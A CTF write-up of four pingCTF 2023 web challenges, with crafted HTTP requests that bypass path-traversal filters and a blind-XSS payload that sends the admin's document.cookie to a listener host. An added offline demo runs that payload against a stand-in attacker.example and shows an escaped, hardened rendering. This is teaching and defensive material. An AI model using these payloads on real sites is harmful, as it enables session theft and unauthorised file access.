pingCTF 2023 - web(4x) writeups

Raw solutions for solved pingCTF 2023 Web challenges


web/internet-explorer

Challenge: Manipulate the User-Agent so that it looks like Linux running Internet Explorer.

GET / HTTP/2
Host: internet-explorer.knping.pl
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Linux x86_64)

Useful site: https://www.useragentstring.com/pages/Internet%20Explorer/


web/youtube-trailer

Challenge: The only provided information was the youtube link.

Solution: the flag is in the page source.

firefox "view-source:https://www.youtube.com/watch?v=siZPvEGrtNY"
# Search for "ping{" using Ctrl+F

web/path-traversal-101

Challenge: Bypass the input validation to perform Path Traversal

tasks.js:

import path from "path";

const preTask = (solution) => {
    if (typeof solution !== "string") {
        throw new Error("Solution must be a string");
    }
    if (solution.length > 512) {
        throw new Error("Solution must be less than 512 characters");
    }
    if (solution === "flag") {
        throw new Error("Your solution can't be 'flag'");
    }
    if (solution === "./flag") {
        throw new Error("Your solution can't be './flag'");
    }
};

export const task1 = (solution) => {
    preTask(solution);
    if (!solution.startsWith("/robot") || solution.endsWith("/flag")) {
        throw new Error(
            `You cannot access the flag (task1)!!! You are UNAUTHORIZED!!! Solution:\n ${solution}, \n ${path.join("/", solution)}`
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";
};

export const task2 = (solution) => {
    preTask(solution);
    solution = solution.replaceAll("../", "");
    if (solution === "/flag") {
        throw new Error(
            `You cannot ACCESS the flag (task2)!!! You are UNAUTHORIZED!!! Solution:\n ${solution}, \n ${path.join("/", solution)}`
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";
};

export const task3 = (solution) => {
    preTask(solution);
    if (solution.includes("../") || solution === "/flag") {
        throw new Error(
            `You CANNOT ACCESS the flag (task3)!!! You are UNAUTHORIZED!!! Solution:\n ${solution}, \n ${path.join("/", solution)}`
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";
};

export const tasks = [
    `if (!solution.startsWith("/robot") || solution.endsWith("/flag")) {
    throw new Error(
        "You cannot access the flag!!! You are UNAUTHORIZED!!! 🤖🤖🤖🤖🤖"
    );
}

const solutionPath = path.join("/", solution);
return solutionPath === "/flag";`,
    `solution = solution.replaceAll("../", "");
    if (solution === "/flag") {
        throw new Error(
            "You cannot ACCESS the flag!!! You are UNAUTHORIZED!!! 🤖🤖🤖🤖🤖"
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";`,
    `if (solution.includes("../") || solution === "/flag") {
    throw new Error(
        "You CANNOT ACCESS the flag!!! You are UNAUTHORIZED!!! 🤖🤖🤖🤖🤖"
    );
}

const solutionPath = path.join("/", solution);
return solutionPath === "/flag";`,
];

Challenge 1

POST /%F0%9F%A4%96 HTTP/2
Host: path-traversal-101.knping.pl
Cookie: token=<token>; Path=/
User-Agent: robot
Content-Type: application/x-www-form-urlencoded

solution=/robot/../flag/.

The string starts with "/robot" and ends with "/." rather than "/flag", so both checks pass; path.join("/", ...) only normalises afterwards and collapses the ".." and the trailing "/." to "/flag".

Challenge 2

POST /%F0%9F%A4%96 HTTP/2
Host: path-traversal-101.knping.pl
Cookie: token=<token>; Path=/
User-Agent: robot
Content-Type: application/x-www-form-urlencoded

solution=../flag/.

replaceAll("../", "") turns this into "flag/.", which is not the blocked literal "/flag"; path.join("/", "flag/.") then yields "/flag".

Challenge 3

POST /%F0%9F%A4%96 HTTP/2
Host: path-traversal-101.knping.pl
Cookie: token=<token>; Path=/
User-Agent: robot
Content-Type: application/x-www-form-urlencoded

solution=././flag/.

No "../" substring and not the exact string "/flag", so the filter lets it through; path.join("/", "././flag/.") normalises the "./" segments and the trailing "/." away, leaving "/flag".

web/i-see-no-vulnerability

Challenge: Perform a blind XSS and retrieve the admin's cookie.

I found out that I can inject JavaScript into the script tag because it is not sanitized by DOMPurify.

Vulnerable Code

(image: vulnerability)

Blind-XSS payload

" + function(){
    flag = document.cookie;
    new Image().src="http://<redacted>?flag="+ flag;
    return 1}(); document.getElementById("vision").textContent = text; //

Generate PNG with payload

(image: payload)

Set up a listener server, then report the image to get the flag =)
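The payload works because the text lands inside JavaScript source, where an HTML sanitiser has nothing to act on. The block below is an added example, not the challenge's or the author's code: it models the injection point and runs the payload against a fake admin browser so the exfiltration can be observed offline, then shows the hardened rendering that leaves the same payload inert. The vulnerable template is an assumption reconstructed from the shape of the payload (it closes a double-quoted string, runs a function, reassigns textContent and comments out the tail); the listener host attacker.example and the cookie value are constructed stand-ins for the redacted ones.

```javascript
// Constructed model of a string-context script injection, not the challenge's code.
// ASSUMPTION: the page interpolates the reported text into a <script> block as a
// double-quoted JS string literal; that shape is inferred from the payload above.
function renderVulnerable(userText) {
    return `var text = "${userText}";\n` +
           `document.getElementById("vision").textContent = text;`;
}

// Hardened form: JSON.stringify emits a valid JS string literal (quotes, backslashes
// and newlines escaped), and \u003c keeps "</script>" from closing the block early.
// This is a JavaScript-context problem; an HTML sanitiser such as DOMPurify does
// not apply to text spliced into script source.
function renderHardened(userText) {
    const literal = JSON.stringify(userText).replace(/</g, "\\u003c");
    return `var text = ${literal};\n` +
           `document.getElementById("vision").textContent = text;`;
}

// The blind-XSS payload from this writeup, with a constructed listener host
// (attacker.example) in place of the redacted one.
const PAYLOAD =
    '" + function(){ flag = document.cookie; ' +
    'new Image().src="http://attacker.example/?flag="+ flag; ' +
    'return 1}(); document.getElementById("vision").textContent = text; //';

// Offline stand-in for the admin's browser: a fake document and Image so the
// rendered script can execute under Node and its side effects be observed.
function runAsAdmin(script, cookie) {
    const node = { textContent: null };
    const requests = [];
    const document = { cookie, getElementById: () => node };
    function Image() {
        // Setting .src on a real Image fires the request; here we only record the URL.
        Object.defineProperty(this, "src", { set(url) { requests.push(url); } });
    }
    new Function("document", "Image", script)(document, Image);
    return { textContent: node.textContent, requests };
}

// Run the same payload through both renderings with a constructed admin cookie.
function demo(cookie = "session=admin-secret") {
    return {
        vulnerable: runAsAdmin(renderVulnerable(PAYLOAD), cookie),
        hardened: runAsAdmin(renderHardened(PAYLOAD), cookie),
    };
}
```

In the vulnerable rendering the literal becomes `"" + function(){...}()`, so the IIFE runs with the admin's cookie in scope, the Image request carries it to the listener, and the trailing `//` swallows the dangling quote; in the hardened rendering the whole payload is just the value of `text` and no request is made.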